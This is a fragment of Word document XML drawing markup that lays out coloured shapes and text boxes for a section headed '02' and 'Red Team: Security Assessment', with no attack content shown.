                  <wp:posOffset>1038225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="777240" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="14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" cy="621665"/>
                          <a:chOff x="720" y="1635"/>
                          <a:chExt cx="1224" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="149" name="Freeform 140"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="719" y="1634"/>
                            <a:ext cx="1224" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 1943 720"/>
                              <a:gd name="T1" fmla="*/ T0 w 1224"/>
                              <a:gd name="T2" fmla="+- 0 2143 1635"/>
                              <a:gd name="T3" fmla="*/ 2143 h 979"/>
                              <a:gd name="T4" fmla="+- 0 1815 720"/>
                              <a:gd name="T5" fmla="*/ T4 w 1224"/>
                              <a:gd name="T6" fmla="+- 0 2028 1635"/>
                              <a:gd name="T7" fmla="*/ 2028 h 979"/>
                              <a:gd name="T8" fmla="+- 0 1815 720"/>
                              <a:gd name="T9" fmla="*/ T8 w 1224"/>
                              <a:gd name="T10" fmla="+- 0 1798 1635"/>
                              <a:gd name="T11" fmla="*/ 1798 h 979"/>
                              <a:gd name="T12" fmla="+- 0 1812 720"/>
                              <a:gd name="T13" fmla="*/ T12 w 1224"/>
                              <a:gd name="T14" fmla="+- 0 1766 1635"/>
                              <a:gd name="T15" fmla="*/ 1766 h 979"/>
                              <a:gd name="T16" fmla="+- 0 1788 720"/>
                              <a:gd name="T17" fmla="*/ T16 w 1224"/>
                              <a:gd name="T18" fmla="+- 0 1707 1635"/>
                              <a:gd name="T19" fmla="*/ 1707 h 979"/>
                              <a:gd name="T20" fmla="+- 0 1743 720"/>
                              <a:gd name="T21" fmla="*/ T20 w 1224"/>
                              <a:gd name="T22" fmla="+- 0 1662 1635"/>
                              <a:gd name="T23" fmla="*/ 1662 h 979"/>
                              <a:gd name="T24" fmla="+- 0 1684 720"/>
                              <a:gd name="T25" fmla="*/ T24 w 1224"/>
                              <a:gd name="T26" fmla="+- 0 1638 1635"/>
                              <a:gd name="T27" fmla="*/ 1638 h 979"/>
                              <a:gd name="T28" fmla="+- 0 1652 720"/>
                              <a:gd name="T29" fmla="*/ T28 w 1224"/>
                              <a:gd name="T30" fmla="+- 0 1635 1635"/>
                              <a:gd name="T31" fmla="*/ 1635 h 979"/>
                              <a:gd name="T32" fmla="+- 0 883 720"/>
                              <a:gd name="T33" fmla="*/ T32 w 1224"/>
                              <a:gd name="T34" fmla="+- 0 1635 1635"/>
                              <a:gd name="T35" fmla="*/ 1635 h 979"/>
                              <a:gd name="T36" fmla="+- 0 820 720"/>
                              <a:gd name="T37" fmla="*/ T36 w 1224"/>
                              <a:gd name="T38" fmla="+- 0 1647 1635"/>
                              <a:gd name="T39" fmla="*/ 1647 h 979"/>
                              <a:gd name="T40" fmla="+- 0 768 720"/>
                              <a:gd name="T41" fmla="*/ T40 w 1224"/>
                              <a:gd name="T42" fmla="+- 0 1682 1635"/>
                              <a:gd name="T43" fmla="*/ 1682 h 979"/>
                              <a:gd name="T44" fmla="+- 0 733 720"/>
                              <a:gd name="T45" fmla="*/ T44 w 1224"/>
                              <a:gd name="T46" fmla="+- 0 1734 1635"/>
                              <a:gd name="T47" fmla="*/ 1734 h 979"/>
                              <a:gd name="T48" fmla="+- 0 720 720"/>
                              <a:gd name="T49" fmla="*/ T48 w 1224"/>
                              <a:gd name="T50" fmla="+- 0 1798 1635"/>
                              <a:gd name="T51" fmla="*/ 1798 h 979"/>
                              <a:gd name="T52" fmla="+- 0 720 720"/>
                              <a:gd name="T53" fmla="*/ T52 w 1224"/>
                              <a:gd name="T54" fmla="+- 0 2450 1635"/>
                              <a:gd name="T55" fmla="*/ 2450 h 979"/>
                              <a:gd name="T56" fmla="+- 0 733 720"/>
                              <a:gd name="T57" fmla="*/ T56 w 1224"/>
                              <a:gd name="T58" fmla="+- 0 2513 1635"/>
                              <a:gd name="T59" fmla="*/ 2513 h 979"/>
                              <a:gd name="T60" fmla="+- 0 768 720"/>
                              <a:gd name="T61" fmla="*/ T60 w 1224"/>
                              <a:gd name="T62" fmla="+- 0 2565 1635"/>
                              <a:gd name="T63" fmla="*/ 2565 h 979"/>
                              <a:gd name="T64" fmla="+- 0 820 720"/>
                              <a:gd name="T65" fmla="*/ T64 w 1224"/>
                              <a:gd name="T66" fmla="+- 0 2600 1635"/>
                              <a:gd name="T67" fmla="*/ 2600 h 979"/>
                              <a:gd name="T68" fmla="+- 0 883 720"/>
                              <a:gd name="T69" fmla="*/ T68 w 1224"/>
                              <a:gd name="T70" fmla="+- 0 2613 1635"/>
                              <a:gd name="T71" fmla="*/ 2613 h 979"/>
                              <a:gd name="T72" fmla="+- 0 1652 720"/>
                              <a:gd name="T73" fmla="*/ T72 w 1224"/>
                              <a:gd name="T74" fmla="+- 0 2613 1635"/>
                              <a:gd name="T75" fmla="*/ 2613 h 979"/>
                              <a:gd name="T76" fmla="+- 0 1716 720"/>
                              <a:gd name="T77" fmla="*/ T76 w 1224"/>
                              <a:gd name="T78" fmla="+- 0 2600 1635"/>
                              <a:gd name="T79" fmla="*/ 2600 h 979"/>
                              <a:gd name="T80" fmla="+- 0 1767 720"/>
                              <a:gd name="T81" fmla="*/ T80 w 1224"/>
                              <a:gd name="T82" fmla="+- 0 2565 1635"/>
                              <a:gd name="T83" fmla="*/ 2565 h 979"/>
                              <a:gd name="T84" fmla="+- 0 1802 720"/>
                              <a:gd name="T85" fmla="*/ T84 w 1224"/>
                              <a:gd name="T86" fmla="+- 0 2513 1635"/>
                              <a:gd name="T87" fmla="*/ 2513 h 979"/>
                              <a:gd name="T88" fmla="+- 0 1815 720"/>
                              <a:gd name="T89" fmla="*/ T88 w 1224"/>
                              <a:gd name="T90" fmla="+- 0 2450 1635"/>
                              <a:gd name="T91" fmla="*/ 2450 h 979"/>
                              <a:gd name="T92" fmla="+- 0 1815 720"/>
                              <a:gd name="T93" fmla="*/ T92 w 1224"/>
                              <a:gd name="T94" fmla="+- 0 2259 1635"/>
                              <a:gd name="T95" fmla="*/ 2259 h 979"/>
                              <a:gd name="T96" fmla="+- 0 1943 720"/>
                              <a:gd name="T97" fmla="*/ T96 w 1224"/>
                              <a:gd name="T98" fmla="+- 0 2143 1635"/>
                              <a:gd name="T99" fmla="*/ 2143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24" h="979">
                                <a:moveTo>
                                  <a:pt x="1223" y="508"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="393"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1092" y="131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1068" y="72"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1023" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="964" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="0"/>
                                </a:ln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7"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="99"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="930"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="965"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="965"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1047" y="930"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1223" y="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1634"/>
                            <a:ext cx="1224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72AEA9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="76"/>
                                <w:ind w:left="219"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="60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60"/>
                                </w:rPr>
                                <w:t>02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3DF898" id="Group 138" o:spid="_x0000_s1032" style="position:absolute;margin-left:36pt;margin-top:81.75pt;width:61.2pt;height:48.95pt;z-index:-15725056;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="720,1635" coordsize="1224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">
                <v:shape id="Freeform 140" o:spid="_x0000_s1033" style="position:absolute;left:719;top:1634;width:1224;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1224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" path="m1223,508l1095,393r,-230l1092,131,1068,72,1023,27,964,3,932,,163,,100,12,48,47,13,99,,163,,815r13,63l48,930r52,35l163,978r769,l996,965r51,-35l1082,878r13,-63l1095,624,1223,508xe" fillcolor="#c00" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1223,2143;1095,2028;1095,1798;1092,1766;1068,1707;1023,1662;964,1638;932,1635;163,1635;100,1647;48,1682;13,1734;0,1798;0,2450;13,2513;48,2565;100,2600;163,2613;932,2613;996,2600;1047,2565;1082,2513;1095,2450;1095,2259;1223,2143" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 139" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:720;top:1634;width:1224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4372AEA9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="76"/>
                          <w:ind w:left="219"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="60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60"/>
                          </w:rPr>
                          <w:t>02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B768E80" wp14:editId="30E9C292">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1352550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1040130</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7517130" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="14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17130" cy="621665"/>
                          <a:chOff x="2130" y="1638"/>
                          <a:chExt cx="11838" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="146" name="Freeform 137"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2130" y="1638"/>
                            <a:ext cx="11838" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 13805 2130"/>
                              <a:gd name="T1" fmla="*/ T0 w 11838"/>
                              <a:gd name="T2" fmla="+- 0 2617 1638"/>
                              <a:gd name="T3" fmla="*/ 2617 h 979"/>
                              <a:gd name="T4" fmla="+- 0 2293 2130"/>
                              <a:gd name="T5" fmla="*/ T4 w 11838"/>
                              <a:gd name="T6" fmla="+- 0 2617 1638"/>
                              <a:gd name="T7" fmla="*/ 2617 h 979"/>
                              <a:gd name="T8" fmla="+- 0 2230 2130"/>
                              <a:gd name="T9" fmla="*/ T8 w 11838"/>
                              <a:gd name="T10" fmla="+- 0 2604 1638"/>
                              <a:gd name="T11" fmla="*/ 2604 h 979"/>
                              <a:gd name="T12" fmla="+- 0 2178 2130"/>
                              <a:gd name="T13" fmla="*/ T12 w 11838"/>
                              <a:gd name="T14" fmla="+- 0 2569 1638"/>
                              <a:gd name="T15" fmla="*/ 2569 h 979"/>
                              <a:gd name="T16" fmla="+- 0 2143 2130"/>
                              <a:gd name="T17" fmla="*/ T16 w 11838"/>
                              <a:gd name="T18" fmla="+- 0 2517 1638"/>
                              <a:gd name="T19" fmla="*/ 2517 h 979"/>
                              <a:gd name="T20" fmla="+- 0 2130 2130"/>
                              <a:gd name="T21" fmla="*/ T20 w 11838"/>
                              <a:gd name="T22" fmla="+- 0 2454 1638"/>
                              <a:gd name="T23" fmla="*/ 2454 h 979"/>
                              <a:gd name="T24" fmla="+- 0 2130 2130"/>
                              <a:gd name="T25" fmla="*/ T24 w 11838"/>
                              <a:gd name="T26" fmla="+- 0 1801 1638"/>
                              <a:gd name="T27" fmla="*/ 1801 h 979"/>
                              <a:gd name="T28" fmla="+- 0 2143 2130"/>
                              <a:gd name="T29" fmla="*/ T28 w 11838"/>
                              <a:gd name="T30" fmla="+- 0 1738 1638"/>
                              <a:gd name="T31" fmla="*/ 1738 h 979"/>
                              <a:gd name="T32" fmla="+- 0 2178 2130"/>
                              <a:gd name="T33" fmla="*/ T32 w 11838"/>
                              <a:gd name="T34" fmla="+- 0 1686 1638"/>
                              <a:gd name="T35" fmla="*/ 1686 h 979"/>
                              <a:gd name="T36" fmla="+- 0 2230 2130"/>
                              <a:gd name="T37" fmla="*/ T36 w 11838"/>
                              <a:gd name="T38" fmla="+- 0 1651 1638"/>
                              <a:gd name="T39" fmla="*/ 1651 h 979"/>
                              <a:gd name="T40" fmla="+- 0 2293 2130"/>
                              <a:gd name="T41" fmla="*/ T40 w 11838"/>
                              <a:gd name="T42" fmla="+- 0 1638 1638"/>
                              <a:gd name="T43" fmla="*/ 1638 h 979"/>
                              <a:gd name="T44" fmla="+- 0 13805 2130"/>
                              <a:gd name="T45" fmla="*/ T44 w 11838"/>
                              <a:gd name="T46" fmla="+- 0 1638 1638"/>
                              <a:gd name="T47" fmla="*/ 1638 h 979"/>
                              <a:gd name="T48" fmla="+- 0 13867 2130"/>
                              <a:gd name="T49" fmla="*/ T48 w 11838"/>
                              <a:gd name="T50" fmla="+- 0 1651 1638"/>
                              <a:gd name="T51" fmla="*/ 1651 h 979"/>
                              <a:gd name="T52" fmla="+- 0 13920 2130"/>
                              <a:gd name="T53" fmla="*/ T52 w 11838"/>
                              <a:gd name="T54" fmla="+- 0 1686 1638"/>
                              <a:gd name="T55" fmla="*/ 1686 h 979"/>
                              <a:gd name="T56" fmla="+- 0 13956 2130"/>
                              <a:gd name="T57" fmla="*/ T56 w 11838"/>
                              <a:gd name="T58" fmla="+- 0 1739 1638"/>
                              <a:gd name="T59" fmla="*/ 1739 h 979"/>
                              <a:gd name="T60" fmla="+- 0 13968 2130"/>
                              <a:gd name="T61" fmla="*/ T60 w 11838"/>
                              <a:gd name="T62" fmla="+- 0 1801 1638"/>
                              <a:gd name="T63" fmla="*/ 1801 h 979"/>
                              <a:gd name="T64" fmla="+- 0 13968 2130"/>
                              <a:gd name="T65" fmla="*/ T64 w 11838"/>
                              <a:gd name="T66" fmla="+- 0 2454 1638"/>
                              <a:gd name="T67" fmla="*/ 2454 h 979"/>
                              <a:gd name="T68" fmla="+- 0 13955 2130"/>
                              <a:gd name="T69" fmla="*/ T68 w 11838"/>
                              <a:gd name="T70" fmla="+- 0 2517 1638"/>
                              <a:gd name="T71" fmla="*/ 2517 h 979"/>
                              <a:gd name="T72" fmla="+- 0 13920 2130"/>
                              <a:gd name="T73" fmla="*/ T72 w 11838"/>
                              <a:gd name="T74" fmla="+- 0 2569 1638"/>
                              <a:gd name="T75" fmla="*/ 2569 h 979"/>
                              <a:gd name="T76" fmla="+- 0 13868 2130"/>
                              <a:gd name="T77" fmla="*/ T76 w 11838"/>
                              <a:gd name="T78" fmla="+- 0 2604 1638"/>
                              <a:gd name="T79" fmla="*/ 2604 h 979"/>
                              <a:gd name="T80" fmla="+- 0 13805 2130"/>
                              <a:gd name="T81" fmla="*/ T80 w 11838"/>
                              <a:gd name="T82" fmla="+- 0 2617 1638"/>
                              <a:gd name="T83" fmla="*/ 2617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838" h="979">
                                <a:moveTo>
                                  <a:pt x="11675" y="979"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="163" y="979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11737" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11826" y="101"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11838" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11838" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11825" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11738" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="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2130" y="1638"/>
                            <a:ext cx="11838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1C350" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="234"/>
                                <w:ind w:left="29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36"/>
                                </w:rPr>
                                <w:t>Red Team</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>: Security Assessment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768E80" id="Group 135" o:spid="_x0000_s1035" style="position:absolute;margin-left:106.5pt;margin-top:81.9pt;width:591.9pt;height:48.95pt;z-index:-15724032;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="2130,1638" coordsize="11838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">
                <v:shape id="Freeform 137" o:spid="_x0000_s1036" style="position:absolute;left:2130;top:1638;width:11838;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="11838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" path="m11675,979l163,979,100,966,48,931,13,879,,816,,163,13,100,48,48,100,13,163,,11675,r62,13l11790,48r36,53l11838,163r,653l11825,879r-35,52l11738,966r-63,13xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11675,2617;163,2617;100,2604;48,2569;13,2517;0,2454;0,1801;13,1738;48,1686;100,1651;163,1638;11675,1638;11737,1651;11790,1686;11826,1739;11838,1801;11838,2454;11825,2517;11790,2569;11738,2604;11675,2617" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 136" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:2130;top:1638;width:11838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11A1C350" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="234"/>
                          <w:ind w:left="295"/>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>Red Team</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>: Security Assessment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E458F95" wp14:editId="0149A951">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1883410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="777240" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="14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" cy="621665"/>
                          <a:chOff x="720" y="2966"/>
                          <a:chExt cx="1224" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="143" name="Freeform 134"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="719" y="2965"/>
                            <a:ext cx="1224" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 1943 720"/>
                              <a:gd name="T1" fmla="*/ T0 w 1224"/>
                              <a:gd name="T2" fmla="+- 0 3474 2966"/>
                              <a:gd name="T3" fmla="*/ 3474 h 979"/>
                              <a:gd name="T4" fmla="+- 0 1815 720"/>
                              <a:gd name="T5" fmla="*/ T4 w 1224"/>
                              <a:gd name="T6" fmla="+- 0 3359 2966"/>
                              <a:gd name="T7" fmla="*/ 3359 h 979"/>
                              <a:gd name="T8" fmla="+- 0 1815 720"/>
                              <a:gd name="T9" fmla="*/ T8 w 1224"/>
                              <a:gd name="T10" fmla="+- 0 3129 2966"/>
                              <a:gd name="T11" fmla="*/ 3129 h 979"/>
                              <a:gd name="T12" fmla="+- 0 1812 720"/>
                              <a:gd name="T13" fmla="*/ T12 w 1224"/>
                              <a:gd name="T14" fmla="+- 0 3097 2966"/>
                              <a:gd name="T15" fmla="*/ 3097 h 979"/>
                              <a:gd name="T16" fmla="+- 0 1788 720"/>
                              <a:gd name="T17" fmla="*/ T16 w 1224"/>
                              <a:gd name="T18" fmla="+- 0 3038 2966"/>
                              <a:gd name="T19" fmla="*/ 3038 h 979"/>
                              <a:gd name="T20" fmla="+- 0 1743 720"/>
                              <a:gd name="T21" fmla="*/ T20 w 1224"/>
                              <a:gd name="T22" fmla="+- 0 2993 2966"/>
                              <a:gd name="T23" fmla="*/ 2993 h 979"/>
                              <a:gd name="T24" fmla="+- 0 1684 720"/>
                              <a:gd name="T25" fmla="*/ T24 w 1224"/>
                              <a:gd name="T26" fmla="+- 0 2969 2966"/>
                              <a:gd name="T27" fmla="*/ 2969 h 979"/>
                              <a:gd name="T28" fmla="+- 0 1652 720"/>
                              <a:gd name="T29" fmla="*/ T28 w 1224"/>
                              <a:gd name="T30" fmla="+- 0 2966 2966"/>
                              <a:gd name="T31" fmla="*/ 2966 h 979"/>
                              <a:gd name="T32" fmla="+- 0 883 720"/>
                              <a:gd name="T33" fmla="*/ T32 w 1224"/>
                              <a:gd name="T34" fmla="+- 0 2966 2966"/>
                              <a:gd name="T35" fmla="*/ 2966 h 979"/>
                              <a:gd name="T36" fmla="+- 0 820 720"/>
                              <a:gd name="T37" fmla="*/ T36 w 1224"/>
                              <a:gd name="T38" fmla="+- 0 2978 2966"/>
                              <a:gd name="T39" fmla="*/ 2978 h 979"/>
                              <a:gd name="T40" fmla="+- 0 768 720"/>
                              <a:gd name="T41" fmla="*/ T40 w 1224"/>
                              <a:gd name="T42" fmla="+- 0 3013 2966"/>
                              <a:gd name="T43" fmla="*/ 3013 h 979"/>
                              <a:gd name="T44" fmla="+- 0 733 720"/>
                              <a:gd name="T45" fmla="*/ T44 w 1224"/>
                              <a:gd name="T46" fmla="+- 0 3065 2966"/>
                              <a:gd name="T47" fmla="*/ 3065 h 979"/>
                              <a:gd name="T48" fmla="+- 0 720 720"/>
                              <a:gd name="T49" fmla="*/ T48 w 1224"/>
                              <a:gd name="T50" fmla="+- 0 3129 2966"/>
                              <a:gd name="T51" fmla="*/ 3129 h 979"/>
                              <a:gd name="T52" fmla="+- 0 720 720"/>
                              <a:gd name="T53" fmla="*/ T52 w 1224"/>
                              <a:gd name="T54" fmla="+- 0 3781 2966"/>
                              <a:gd name="T55" fmla="*/ 3781 h 979"/>
                              <a:gd name="T56" fmla="+- 0 733 720"/>
                              <a:gd name="T57" fmla="*/ T56 w 1224"/>
                              <a:gd name="T58" fmla="+- 0 3844 2966"/>
                              <a:gd name="T59" fmla="*/ 3844 h 979"/>
                              <a:gd name="T60" fmla="+- 0 768 720"/>
                              <a:gd name="T61" fmla="*/ T60 w 1224"/>
                              <a:gd name="T62" fmla="+- 0 3896 2966"/>
                              <a:gd name="T63" fmla="*/ 3896 h 979"/>
                              <a:gd name="T64" fmla="+- 0 820 720"/>
                              <a:gd name="T65" fmla="*/ T64 w 1224"/>
                              <a:gd name="T66" fmla="+- 0 3931 2966"/>
                              <a:gd name="T67" fmla="*/ 3931 h 979"/>
                              <a:gd name="T68" fmla="+- 0 883 720"/>
                              <a:gd name="T69" fmla="*/ T68 w 1224"/>
                              <a:gd name="T70" fmla="+- 0 3944 2966"/>
                              <a:gd name="T71" fmla="*/ 3944 h 979"/>
                              <a:gd name="T72" fmla="+- 0 1652 720"/>
                              <a:gd name="T73" fmla="*/ T72 w 1224"/>
                              <a:gd name="T74" fmla="+- 0 3944 2966"/>
                              <a:gd name="T75" fmla="*/ 3944 h 979"/>
                              <a:gd name="T76" fmla="+- 0 1716 720"/>
                              <a:gd name="T77" fmla="*/ T76 w 1224"/>
                              <a:gd name="T78" fmla="+- 0 3931 2966"/>
                              <a:gd name="T79" fmla="*/ 3931 h 979"/>
                              <a:gd name="T80" fmla="+- 0 1767 720"/>
                              <a:gd name="T81" fmla="*/ T80 w 1224"/>
                              <a:gd name="T82" fmla="+- 0 3896 2966"/>
                              <a:gd name="T83" fmla="*/ 3896 h 979"/>
                              <a:gd name="T84" fmla="+- 0 1802 720"/>
                              <a:gd name="T85" fmla="*/ T84 w 1224"/>
                              <a:gd name="T86" fmla="+- 0 3844 2966"/>
                              <a:gd name="T87" fmla="*/ 3844 h 979"/>
                              <a:gd name="T88" fmla="+- 0 1815 720"/>
                              <a:gd name="T89" fmla="*/ T88 w 1224"/>
                              <a:gd name="T90" fmla="+- 0 3781 2966"/>
                              <a:gd name="T91" fmla="*/ 3781 h 979"/>
                              <a:gd name="T92" fmla="+- 0 1815 720"/>
                              <a:gd name="T93" fmla="*/ T92 w 1224"/>
                              <a:gd name="T94" fmla="+- 0 3590 2966"/>
                              <a:gd name="T95" fmla="*/ 3590 h 979"/>
                              <a:gd name="T96" fmla="+- 0 1943 720"/>
                              <a:gd name="T97" fmla="*/ T96 w 1224"/>
                              <a:gd name="T98" fmla="+- 0 3474 2966"/>
                              <a:gd name="T99" fmla="*/ 347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24" h="979">
                                <a:moveTo>
                                  <a:pt x="1223" y="508"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="393"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1092" y="131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1068" y="72"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1023" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="964" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="47"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="99"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="930"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="965"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="965"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1047" y="930"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1223" y="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5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Text Box 133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2965"/>
                            <a:ext cx="1224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F2E8E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="76"/>
                                <w:ind w:left="219"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="60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60"/>
                                </w:rPr>
